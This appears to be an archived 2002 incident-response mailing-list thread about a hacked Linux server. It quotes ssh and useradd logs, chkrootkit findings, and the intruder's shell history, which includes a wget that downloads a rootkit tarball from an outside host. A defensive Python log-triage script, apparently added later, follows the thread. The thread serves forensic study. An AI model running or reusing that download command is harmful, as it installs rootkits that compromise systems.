We used Linux 2.4.7-10. We only opened ports 21 (ftp), 22 (ssh), and 443 (https):

21  - wu-ftpd-2.6.1-20
22  - openssh-3.1
443 - tomcat-3.2.4

1. This is the content of /home/war's .bash_history:

wget
wget http://mrunix.free.fr/roy/w00tkit.tgz
logout

2. He was trying to send a mail to himself regarding the system's resources:

The original message was received at Thu, 5 Sep 2002 22:21:37 +0800
from root@localhost

   ----- The following addresses had permanent fatal errors -----
roi_blablaat_private
    (reason: 501 5.1.8 Sender domain must exist)

   ----- Transcript of session follows -----
... while talking to rmail.walla.co.il.:
>>> MAIL From:<rootat_private> SIZE=2283
<<< 501 5.1.8 Sender domain must exist
501 5.6.0 Data format error

3. walla.co.il is in Israel.

4. Tracing 212.179.207.211 gives Israel also.

I have moved the files to another machine and reinstalled the server 'cause we need to put it up and running ASAP.

Do you think the exploit was done through ftp? Can you help me replicate it? I was looking for procedures or scripts in ssh/ftp exploits so that I can try to attack our server, but I cannot find any.

--- Loki <lokiat_private> wrote:
> What version of SSHD were you running, check commonly exploited services.
>
> 1. SSHD (crc32)
> 2. FTPD
> 3. Apache (chunking)
>
> Get back to us with the versions you were running of SSH, FTP, and Apache and we can help you out. How hardened was the OS? Did you turn off all RPC services, etc. We need more info.
>
> Eric/Loki
> Internet Warfare and Intelligence
> Fate Research Labs
> www.fatelabs.com
>
> -----Original Message-----
> From: Ver Allan Sumabat [mailto:ver_allanat_private]
> Sent: Tuesday, September 10, 2002 6:08 AM
> To: incidentsat_private
> Subject: possible ssh hack
>
> Hi,
>
> We have just recently been hacked. I have no idea how he came in. Here are my preliminary investigations:
>
> 1. He was able to add a user without logging in.
>
> **Unmatched Entries**
> Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse map address 10.13.41.4.
> Sep 5 10:39:35 srv1 sshd[20514]: Accepted password for root from 10.13.41.4 port 4207
> Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse map address 10.13.41.4.
> Sep 5 17:30:41 srv1 sshd[23299]: Accepted password for root from 10.13.41.4 port 2491
> Sep 5 22:16:59 srv1 useradd[23532]: new group: name=war, gid=502
> Sep 5 22:16:59 srv1 useradd[23532]: new user: name=war, uid=502, gid=502, home=/home/war, shell=/bin/bash
> Sep 5 22:17:31 srv1 sshd[23534]: Accepted password for war from 212.179.207.211 port 2746
> Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from socket failed: Connection reset by peer
> Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP; restarting.
>
> 2. He installed a tarball w00tkit.tgz in /home/war
>
> 3. After running chkrootkit, the significant lines are:
>
> ...
> Checking `ifconfig'... INFECTED
> ...
> Searching for Showtee... Warning: Possible Showtee Rootkit installed
> ...
> Checking `lkm'... You have 1 process hidden for ps command
> Warning: Possible LKM Trojan installed
>
> 4. ssh won't run anymore
>
> Can anyone help me on how the intrusion was done?
>
> Thanks.
>
> Regards,
>
> Allan
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
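One way to triage the sshd and useradd lines quoted in this thread for the three patterns the reports turn on (password logins as root, a freshly created account logging in from a new address, and an sshd restart right after), as an added example that is not part of any post above; the sample log is a constructed copy of the quoted excerpt, and the one-hour correlation window is an assumption:

```python
import re
from datetime import datetime

# Constructed sample input: the sshd/useradd lines quoted in the thread above.
SAMPLE_LOG = """\
Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse map address 10.13.41.4.
Sep 5 10:39:35 srv1 sshd[20514]: Accepted password for root from 10.13.41.4 port 4207
Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse map address 10.13.41.4.
Sep 5 17:30:41 srv1 sshd[23299]: Accepted password for root from 10.13.41.4 port 2491
Sep 5 22:16:59 srv1 useradd[23532]: new group: name=war, gid=502
Sep 5 22:16:59 srv1 useradd[23532]: new user: name=war, uid=502, gid=502, home=/home/war, shell=/bin/bash
Sep 5 22:17:31 srv1 sshd[23534]: Accepted password for war from 212.179.207.211 port 2746
Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from socket failed: Connection reset by peer
Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP; restarting.
"""

TS = r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ "  # syslog timestamp + hostname
ACCEPT_RE = re.compile(TS + r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port \d+")
USERADD_RE = re.compile(TS + r"useradd\[\d+\]: new user: name=(\w+), uid=(\d+)")
SIGHUP_RE = re.compile(TS + r"sshd\[\d+\]: Received SIGHUP")


def _ts(raw):
    # Syslog timestamps carry no year; a year-less datetime is fine for deltas.
    return datetime.strptime(" ".join(raw.split()), "%b %d %H:%M:%S")


def triage(log, window_s=3600):
    """Return (kind, detail) findings; window_s (assumed value) bounds the
    useradd-to-first-login correlation."""
    findings, created = [], {}  # created: username -> creation time
    for line in log.splitlines():
        if m := USERADD_RE.match(line):
            created[m[2]] = _ts(m[1])
            findings.append(("useradd", f"{m[2]} (uid {m[3]}) created at {m[1]}"))
        elif m := ACCEPT_RE.match(line):
            t, method, user, src = _ts(m[1]), m[2], m[3], m[4]
            if user == "root" and method == "password":
                findings.append(("root-password-login", f"root from {src} at {m[1]}"))
            if user in created:
                delta = (t - created[user]).total_seconds()
                if 0 <= delta <= window_s:
                    findings.append(("new-account-login",
                                     f"{user} from {src} {delta:.0f}s after creation"))
        elif m := SIGHUP_RE.match(line):
            findings.append(("sshd-restart", f"sshd re-read its config at {m[1]}"))
    return findings


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_LOG):
        print(f"{kind:22} {detail}")
```

On the quoted excerpt this flags the two root password logins from 10.13.41.4, the login of `war` 32 seconds after the account was created, and the sshd restart that followed; the bare "Could not reverse map" lines are left alone because on their own they only say the client has no PTR record.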
This archive was generated by hypermail 2b30 : Wed Sep 11 2002 - 21:10:22 PDT